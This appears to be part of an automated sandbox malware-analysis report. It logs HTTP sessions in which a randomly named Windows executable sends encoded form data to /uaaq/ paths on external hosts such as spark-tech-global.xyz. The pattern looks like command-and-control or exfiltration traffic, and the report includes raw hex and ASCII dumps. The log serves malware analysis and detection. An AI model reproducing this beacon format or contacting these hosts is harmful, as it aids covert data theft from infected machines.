75 67 64 55 2b 78 70 43 61 67 30 36 63 6d 6c 35 4a 4f 59 73 37 46 33 74 54 50 55 35 54 33 57 70 67 58 4d 30 6d 42 45 73 47 6a 77 2b 6a 5a 62 58 6f 58 57 6a 4f 42 6f 37 52 44 68 72 63 33 6a 4f 4e 67 6d 63 64 66 78 37 73 6a 55 68 70 45 5a 58 62 37 33 74 2b 7a 35 6f 51 4d 5a 75 74 6c 7a 59 49 38 4a 73 68 4e 45 53 67 68 65 6b 34 66 35 58 4b 4e 67 6e 31 75 71 31 75 62 33 53 38 6c 50 69 4d 32 51 4f 2f 77 6f 69 6c 33 64 77 36 32 4f 58 45 71 7a 66 66 53 42 6c 47 4b 4f 4c 57 59 71 45 51 61 69 71 61 4b 72 6a 4a 6c 2b 77 71 54 70 6e 70 45 2b 4a 78 4d 66 33 54 33 54 43 46 6e 50 67 35 33 56 48 34 42 33 6a 78 76 55 53 32 61 6c 31 37 34 4a 4b 65 53 46 38 69 34 34 68 4c 59 52 72 33 61 61 4d 45 73 70 4f 4f 50 52 39 4b 74 59 62 75 4f 70 34 73 6c 49 44 39 47 65 6e 38 52 6a 4c 37 36 56 46 31 43 79 51 30 76 69 76 2b 70 4e 6c 2f 4b 75 5a 6d 6e 68 69 2b 77 63 31 31 57 44 6a 66 6d 38 7a 6c 52 4e 73 71 6b 44 54 37 76 69 73 53 35 37 52 4c 6a 45 51 66 4b 32 33 7a 6a 72 32 75 75 56 4f 31 39 72 79 43 6f 4b 6c 41 61 52 4a 47 6b 66 61 35 73 55 69 78 52 64 4c 6c 72 79 47 59 42 71 79 74 49 48 7a 56 42 53 74 76 68 4c 68 67 4b 34 73 39 68 2f 71 31 57 73 4f 41 2f 75 30 34 4d 75 50 53 68 6a 61 37 6c 6c 47 34 48 37 79 7a 4b 59 30 57 35 66 73 70 2b 51 7a 65 68 4b 33 6e 33 32 4a 45 48 73 63 5a 2b 73 58 2f 35 33 69 49 62 37 41 2b 75 78 6c 67 6b 6c 6f 59 7a 6f 7a 6d 59 38 47 54 79 6b 4c 49 44 43 79 4d 59 62 51 74 71 64 6f 4d 2f 59 6b 59 47 6a 37 5a 37 4d 61 78 59 53 68 5a 4a 7a 47 2f 2b 54 35 57 73 70 4f 61 66 47 34 7a 46 32 71 49 31 65 43 36 32 79 4e 58 36 52 4b 31 70 44 64 4b 49 6a 63 54 63 39 49 61 37 64 61 6f 55 52 61 4d 4a 36 6d 58 49 72 4b 39 68 2f 31 58 4b 77 70 66 53 69 44 31 31 73 4c 41 6d 5a 64 35 68 42 53 70 2f 7a 36 68 68 63 49 68 4c 52 62 31 57 64 33 4d 65 70 74 36 50 58 39 50 43 47 4a 62 58 6f 46 41 4b 67 70 69 67 68 49 66 66 47 77 77 51 6e 6f 4c 4f 59 4f 38 6b 34 57 31 39 71 55 51 6f 70 4e 33 71 44 4c 44 2b 71 39 6d 68 36 42 72 34 64 6e 71 56 67 4f 72 69 5a 72 51 48 50 70 6d 2f 56 72 46 33 32 54 32 70 6d 49 6f 45 33 48 70 79 50 71 65 54 56 6b 39 4c 75 7a 6f 32 61 75 73 6c 67
                                                                                    Data Ascii: 9pG0L=K3dDErmwgWQgCo4xgwwYXBOLnNVvS/SpV6RSHSAsBfvsSY5Z8FjLWgzeVwU/DK5NCLcTOk8T3XyugHNa3Krdxf0fZ7rV00Y7tnBpyGkAGVIRYxK35FSwJoCCph3ysrCQk53B4LeRxvq+HnNMR3NnMMeZJ5ljpTdDUAg52kk4exE1U6dHRACGFEu9As/Qkt9J2jT/fiGGqgq7K90h+SnHLJXKqoIdk10RoRULXV/1Kxh42fs/kGpn9kHF+ptxfGe4/E7ct7dSs+naLUEkPMzvsmuRa7H0+m1gbirwJ0el6nD54scHj2BN2e8uSBfWf/z50bhkt2n5doSyYw6wGKV/hca2N/RTs3TOMwiHreTl9dpv/+SA1ynAYBx0AWyntiZDwhTDUJBO+1Jy8ooiYcbDwOyavVDLVGtMUjRdcugdU+xpCag06cml5JOYs7F3tTPU5T3WpgXM0mBEsGjw+jZbXoXWjOBo7RDhrc3jONgmcdfx7sjUhpEZXb73t+z5oQMZutlzYI8JshNESghek4f5XKNgn1uq1ub3S8lPiM2QO/woil3dw62OXEqzffSBlGKOLWYqEQaiqaKrjJl+wqTpnpE+JxMf3T3TCFnPg53VH4B3jxvUS2al174JKeSF8i44hLYRr3aaMEspOOPR9KtYbuOp4slID9Gen8RjL76VF1CyQ0viv+pNl/KuZmnhi+wc11WDjfm8zlRNsqkDT7visS57RLjEQfK23zjr2uuVO19ryCoKlAaRJGkfa5sUixRdLlryGYBqytIHzVBStvhLhgK4s9h/q1WsOA/u04MuPShja7llG4H7yzKY0W5fsp+QzehK3n32JEHscZ+sX/53iIb7A+uxlgkloYzozmY8GTykLIDCyMYbQtqdoM/YkYGj7Z7MaxYShZJzG/+T5WspOafG4zF2qI1eC62yNX6RK1pDdKIjcTc9Ia7daoURaMJ6mXIrK9h/1XKwpfSiD11sLAmZd5hBSp/z6hhcIhLRb1Wd3Mept6PX9PCGJbXoFAKgpighIffGwwQnoLOYO8k4W19qUQopN3qDLD+q9mh6Br4dnqVgOriZrQHPpm/VrF32T2pmIoE3HpyPqeTVk9Luzo2auslg
                                                                                    Dec 4, 2023 12:05:22.331523895 CET1340INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:21 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Vary: Accept-Encoding,User-Agent
                                                                                    Content-Encoding: gzip
                                                                                    Content-Length: 11321
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 7d db 76 db 48 92 e0 b3 7d 4e fd 03 0c cf d8 64 17 01 02 e0 55 94 e4 1a b7 ed ea ae 29 bb ec 53 72 b5 77 a6 e4 c3 93 04 92 24 2c 10 40 03 a0 28 4a a5 97 79 d9 6f d8 4f d8 e7 7e db b3 4f db d3 ff b5 11 99 09 20 01 82 17 dd aa ad 2a fb 22 01 99 91 11 91 91 91 91 11 79 c3 c1 a3 97 6f 5f bc ff 8f 77 af 94 69 32 f3 9e 3d 3c c0 5f 8a ed 91 38 3e 54 f1 59 55 3c e2 4f 0e d5 d0 d3 de bd 56 11 80 12 e7 d9 c3 07 07 33 9a 10 c5 9e 92 28 a6 c9 a1 fa d3 fb 6f b5 be 8a e9 9e eb 9f 28 11 f5 a0 48 14 8c 5d 8f aa ca 34 a2 63 c4 96 84 f1 a0 d9 9c cc c2 89 1e 44 93 e6 d9 d8 6f 9a 26 14 4a b1 f9 64 46 0f 9f 46 c1 28 48 e2 a7 8a 1d f8 09 f5 93 c3 a7 7e e0 fa 0e 3d 6b 28 e3 c0 f3 82 c5 53 a5 09 6c e4 05 d4 53 97 2e c2 20 4a d4 ac 88 ba 70 9d 64 7a e8 d0 53 d7 a6 1a 7b 69 28 ae ef 26 2e f1 b4 d8 26 1e 3d 34 19 b3 8f 34 4d 79 3f 75 63 25 76 13 aa c0 ef 20 4c dc 99 7b 4e 1d 65 e1 26 53 25 99 52 e5 3f 02 12 27 ca d1 ab b7 4a e8 cd 27 ae af 9c 5a a6 de 51 34 25 ad d0 12 01 74 3b 98 35 17 41 e4 84 11 8d e3 26 07 8d 9b 31 0d 9a 8a a6 21 ad c4 4d 3c fa ec 1d 99 50 c5 0f 12 a8 cc dc 77 00 cb 1b 12 b9 c4 f7 89 72 44 a3 c0 3e 21 07 4d 0e 98 0a 05 a4 18 d2 28 59 1e aa c1 64 e0 05 c8 bc 54 d1 d0 1b 42 b3 a0 44 aa c0 19 26 09 7a 2b f1 b5 98 50 3e 43 14 b7 84 6d 4d e1 d8 8e dc 30 51 92 65 08 6d 43 c2 d0 73 6d 92 b8 81 df f4 9c af 3f c5 81 af a6 ea c5 e4 06 cd 31 a5 33 a2 4d 22 12 4e d5 67 17 ea bf 31 fc 67 89 3a c8 34 86 83 a0 ce a8 0d f5 df 38 e4 e0 67 00 45 1a 00 f7 81 8e 8e 80 3f cc 74 1d a9 dc 4c 30 18 73 fe 58 13 3d 5e d0 51 cc 81 e7 91 b7 05 18 80 58 9d 07 ab 75 6d a8 0e e5 35 85 aa 01 c0 7b 3a 0b 3d 02 4a f4 bd 9b 40 66 38 1f 79 6e 3c a5 91 3a b8 d8 85 2b 51 c7 26 48 1c 44 d4 6c 77 1d d2 35 f7 0c 32 36 69 67 34 ea 77 db e3 7e ab df e9 1b 1d ba 47 ad 8e a5 5e 02 89 00 9b 01 34 fa b9 cd 79 90 24 72 44 49 64 4f 45 46 43 4d 48 34 a1 09 63 45 00 bc f2 93 68 f9 0e 3a 56 c2 05 91 b2 bf 85 cf 6f e2 c3 8b 98 e1 1e 26 34 9a 0d e3 24 72 fd c9 25 b2 f3 d7 39 8d 96 9a eb 87 73 6c ba 88 fe 75 ee 46 d0 8d 58 17 5d 2d a2 5e 7e 6c a8 ae ff 1a 6c cb 1c 94 12 4a 70 03 73 d9 c8 78 fc 59 7d c7 84 01 0c be 8d 26 c4 77 cf 99 1a a9 1f 77 6a e6 ab 0a 34 6b 69 e2 cc 5c a4 e9 ce 18 5f b9 c8 be c3 84 b7 a3 4f d4 46 99 55 f0 7e 1d be 18 95 e6 4e ca b8 08 35 d1 f5 9a f3 d0 0b 88 13 37 2d c3 6a 35 4d a3 69 43 57 0d a9 a3 19 86 39 a4 0e 68 b7 a3 75 f4 4f 21 76 17 51 e4 a7 3b 42 cf 6c ab 3a e8 98 56 43 9d 52 77 32 4d c4 8b 4d d2 9e c1 05 0a 1a e2 05 93
                                                                                    Data Ascii: }vH}NdU)Srw$,@(JyoO~O *"yo_wi2=<_8>TYU<OV3(o(H]4cDo&JdFF(H~=k(SlS. JpdzS{i(&.&=44My?uc%v L{Ne&S%R?'J'ZQ4%t;5A&1!M<PwrD>!M(YdTBD&z+P>CmM0QemCsm?13M"Ng1g:48gE?tL0sX=^QXum5{:=J@f8yn<:+Q&HDlw526ig4w~G^4y$rDIdOEFCMH4cEh:Vo&4$r%9sluFX]-^~llJpsxY}&wwj4ki\_OFU~N57-j5MiCW9huO!vQ;Bl:VCRw2MM
                                                                                    Dec 4, 2023 12:05:22.331608057 CET1340INData Raw: e0 7a dd 41 48 09 70 c4 d0 48 cf 63 54 8e 0d e5 d5 8f 97 1f 2f 0f 9a bc 7b a6 66 be b9 62 c8 75 66 98 1f 3e cc 87 ac a7 8e 1f 6b 60 c0 c7 34 b1 a7 4f f9 b8 f5 b4 92 04 1f 84 f2 b1 8e 78 a0 dc 3e 76 a0 0a c3 17 c5 f1 d7 67 38 94 32 7b bc 6a 38 95
                                                                                    Data Ascii: zAHpHcT/{fbuf>k`4Ox>vg82{j8'<W'>)"tnyR-;'D;@,3`!#$`bPPGEq3h<MViuC7=gcGCz _q<Yd~B\
                                                                                    Dec 4, 2023 12:05:22.331666946 CET1340INData Raw: 35 d6 f7 c1 e6 29 b4 9e 77 38 18 7e 0f 29 fc 90 fa a0 9e 77 ba c3 ca d4 27 4f 0a e5 1b bc 3b 3f 02 25 44 d5 ad 2a 91 77 de 6a 8c 79 7e 09 77 7d ff c6 f8 1e 49 10 c8 28 d4 14 cc 01 5a e3 e5 e1 23 13 de 22 7c 7c 41 3c 6f 44 ec 13 b9 af cb 80 c6 e5
                                                                                    Data Ascii: 5)w8~)w'O;?%D*wjy~w}I(Z#"||A<oDXs?")m5R+vQs.9$Ex!xCMVJ9zcMRqD9|9,)0-8&@Rg/2pY^HyP2O!wDTdi
                                                                                    Dec 4, 2023 12:05:22.331773043 CET1340INData Raw: 2d ba a6 4d 38 74 38 8f 42 0f 41 f7 46 1d 93 96 eb 38 c1 3e 01 76 67 05 37 f4 f2 12 02 54 2d 12 65 25 6a 66 ab e3 d0 49 23 9a 8c 48 ad db 30 db bd 86 65 f5 1a 66 5d 01 23 04 89 35 b3 d3 69 f4 4d 48 6c d7 15 b4 4c f5 b5 a4 cb 12 ce 69 cb 62 5c 4f
                                                                                    Data Ascii: -M8t8BAF8>vg7T-e%jfI#H0ef]#5iMHlLib\OfZ1f7zJ kk<tF.LeWbf)!5]8NbeMAHvlhot@ Fi.H4I4m$k66sf%KDNvG7M =
                                                                                    Dec 4, 2023 12:05:22.331830978 CET1340INData Raw: 3c ab c2 29 6d 13 f3 c9 a9 3b 61 1b a8 14 52 98 7f 07 08 ca 8f 47 8a ad 64 f5 7a 3a 7b e2 fa 00 e7 22 9e 7f d6 04 ec 2a e1 3b 99 5f 96 e4 94 ef 6f 97 24 6f b2 25 32 b6 90 92 9d c2 d1 bb fb bb 9d 71 11 d2 05 ef 66 1c b1 a5 09 67 f7 53 2e e9 d5 1e
                                                                                    Data Ascii: <)m;aRGdz:{"*;_o$o%2qfgS.D&H/Zn]e]WdRX3{;V&.{{7dY8s6MfaL;:GvqeF9-WXkYol0^
                                                                                    Dec 4, 2023 12:05:22.332099915 CET1340INData Raw: ce 2a ce da 60 a5 c6 a8 98 b8 27 56 16 2c 9f 72 d3 26 24 cc 68 0a 24 eb 70 20 7c 11 81 d6 6a 95 a4 b8 02 b5 5e 88 74 d4 ef 10 47 aa 68 21 a1 58 4d 8e 96 33 58 cd 1e b7 a1 ac 6b 57 d0 0a 83 70 8e 53 99 8e a4 21 d5 78 d6 f3 6b 3a ce 5e ab 6f 28 65
                                                                                    Data Ascii: *`'V,r&$h$p |j^tGh!XM3XkWpS!xk:^o(e+a2,UED9%2z7)S!R>j)x2ij88^l#fvM?C/VvO)e.J'\~%tlw/W-868YsU7
                                                                                    Dec 4, 2023 12:05:22.332171917 CET1340INData Raw: aa e2 ef 25 38 2c db 96 7b 18 2a 96 9d a1 7b 18 38 96 4d c4 bd 0d 23 4b 15 b9 b7 41 65 a9 1e d7 0a 31 3f bf a5 70 db 1e 8d 0d cb 96 72 78 e8 24 36 9b 4a 2b b1 02 f2 b3 5d 22 ef b5 fa ed 7e 5f 5e 81 5e b3 30 ce 22 57 0f 7b 61 ba c6 97 e0 b1 69 be
                                                                                    Data Ascii: %8,{*{8M#KAe1?prx$6J+]"~_^^0"W{ai]c LpSwXhH^qX3YhU,JY(8ovwVlZ,:2$"3VfCV*:n56p?^N{Lm\~ZFXP,6f=Ows;7cKgv
                                                                                    Dec 4, 2023 12:05:22.332227945 CET1340INData Raw: 78 47 d9 fd dd 43 f6 e5 60 12 e6 7e 39 98 b4 e9 60 d2 6f 2d 20 fb 72 30 e9 be 05 6b 5f 0e 26 7d 39 98 f4 e5 60 52 45 6d 7e fb 21 df 97 83 49 f7 21 1c fc 72 30 e9 cb c1 a4 2f 07 93 be 1c 4c aa ac c7 5d 1f 4c 2a 26 17 ce 0a dc e9 fd dd 66 ab df 36
                                                                                    Data Ascii: xGC`~9`o- r0k_&}9`REm~!I!r0/L]L*&f6i[5G_J{V].zXExg-gF6hq=`{=x\q.T!Zv1hg[_)<d338TLOFoY2
                                                                                    Dec 4, 2023 12:05:22.332284927 CET1340INData Raw: f7 7a 86 39 32 ec 56 bf d3 1b ef 99 6d cb b4 e8 38 23 8e c0 1b 02 a1 1c 42 23 e3 84 4d e4 2f 42 9d 51 80 4e c1 62 20 fa 92 24 a4 a6 5c 28 4f 71 52 55 71 dc 88 cf ef 1d cf 0d c3 68 7b 49 f4 74 a0 fc ac 3c c5 07 e5 a3 72 a9 d4 ab 1c e6 55 b3 93 f5
                                                                                    Data Ascii: z92Vm8#B#M/BQNb $\(OqRUqh{It<rU =SJEEk{vt:{@" x0s oD/LqjSX& h$T/!8|C@8g~@6MkS`3Upx/ #B}95K_0d3Ny
                                                                                    Dec 4, 2023 12:05:22.332329035 CET265INData Raw: 8d ed 52 48 86 9e 3b ab ef 0b 8c 1d 00 2f 7f c3 51 4b ec 95 4c 87 79 0c 44 e9 18 02 1b 88 19 21 f1 e7 8f 50 f4 84 c7 31 78 77 dc 29 2d 4a f3 67 15 3d 81 10 ba e8 50 58 a6 46 9e 22 ba f4 c7 86 ca d7 a0 87 6c bd 72 98 4e c3 03 1b 4b a0 81 21 19 4f
                                                                                    Data Ascii: RH;/QKLyD!P1xw)-Jg=PXF"lrNK!OZkt53!n}{)-qC(p1h2MqVQuBT$6oD]Ize]l 5G|nLf<4Hm>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.11.304978265.108.122.245803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:24.134203911 CET431OUTGET /uaaq/?9pG0L=H11jHdK8tiQEdc8HiBJGcTnPn4JeKO7dY7p2R0AEMYCSTpUW3HGmQSiGfhMiAqlsALoBPlIqyHCk3n5D4MLz3+EHJa2hwQp0yQ==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:05:24.823247910 CET603INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 04 Dec 2023 11:05:24 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    X-Redirect-By: WordPress
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Location: http://mariannaserocka.com/uaaq/?9pG0L=H11jHdK8tiQEdc8HiBJGcTnPn4JeKO7dY7p2R0AEMYCSTpUW3HGmQSiGfhMiAqlsALoBPlIqyHCk3n5D4MLz3+EHJa2hwQp0yQ==&XFs82=6R5Xx6907
                                                                                    Vary: User-Agent
                                                                                    Content-Length: 0
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.11.3049783162.0.222.119803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:30.248097897 CET719OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.spark-tech-global.xyz
                                                                                    Referer: http://www.spark-tech-global.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 6a 6f 2f 57 42 5a 30 68 66 75 6f 30 48 46 65 37 4f 62 77 6f 54 63 64 6d 68 65 47 41 74 65 6a 30 33 32 42 66 53 75 62 45 49 43 37 6c 49 30 66 4d 31 6a 45 7a 31 50 41 70 69 5a 69 6e 48 6d 4e 33 4c 74 79 35 74 49 45 64 49 74 68 4b 33 4c 4e 6e 6c 57 69 63 56 44 58 6a 31 45 66 68 37 57 75 59 37 30 6f 55 4d 76 2b 51 33 2f 47 31 78 4d 6b 6d 4d 70 36 5a 2b 72 35 49 37 4d 30 34 5a 2f 5a 2b 67 53 58 79 47 39 55 53 41 46 50 44 44 73 67 37 46 68 76 32 44 47 63 7a 61 6a 4f 4e 43 65 70 54 7a 4d 68 76 51 70 54 65 79 67 6a 6b 4a 34 34 65 6f 67 3d 3d
                                                                                    Data Ascii: 9pG0L=jo/WBZ0hfuo0HFe7ObwoTcdmheGAtej032BfSubEIC7lI0fM1jEz1PApiZinHmN3Lty5tIEdIthK3LNnlWicVDXj1Efh7WuY70oUMv+Q3/G1xMkmMp6Z+r5I7M04Z/Z+gSXyG9USAFPDDsg7Fhv2DGczajONCepTzMhvQpTeygjkJ44eog==
                                                                                    Dec 4, 2023 12:05:30.585594893 CET587INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:30 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.11.3049784162.0.222.119803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:32.953109026 CET739OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.spark-tech-global.xyz
                                                                                    Referer: http://www.spark-tech-global.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 6a 6f 2f 57 42 5a 30 68 66 75 6f 30 47 6b 4f 37 4d 38 45 6f 55 38 64 6e 6b 65 47 41 6a 4f 6a 77 33 78 4a 66 53 72 69 4a 50 77 76 6c 4e 6c 44 4d 6e 69 45 7a 32 50 41 70 32 70 69 69 49 47 4d 31 4c 74 75 62 74 4d 45 64 49 73 46 4b 33 4b 39 6e 6c 48 6a 4b 54 54 58 68 68 30 66 6a 2f 57 75 59 37 30 6f 55 4d 76 61 32 33 2b 75 31 32 34 59 6d 65 59 36 59 77 4c 35 48 38 4d 30 34 64 2f 5a 79 67 53 58 41 47 34 77 30 41 48 48 44 44 74 77 37 47 31 37 31 4d 47 63 39 55 44 50 69 47 4b 77 6d 37 4c 56 77 52 37 2f 2f 7a 79 65 44 42 4e 55 4e 76 59 54 36 47 4a 57 30 73 5a 6d 56 6f 43 55 2f 31 66 78 42 31 78 55 3d
                                                                                    Data Ascii: 9pG0L=jo/WBZ0hfuo0GkO7M8EoU8dnkeGAjOjw3xJfSriJPwvlNlDMniEz2PAp2piiIGM1LtubtMEdIsFK3K9nlHjKTTXhh0fj/WuY70oUMva23+u124YmeY6YwL5H8M04d/ZygSXAG4w0AHHDDtw7G171MGc9UDPiGKwm7LVwR7//zyeDBNUNvYT6GJW0sZmVoCU/1fxB1xU=
                                                                                    Dec 4, 2023 12:05:33.256828070 CET587INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:33 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.11.3049785162.0.222.119803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:35.655472040 CET1656OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.spark-tech-global.xyz
                                                                                    Referer: http://www.spark-tech-global.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
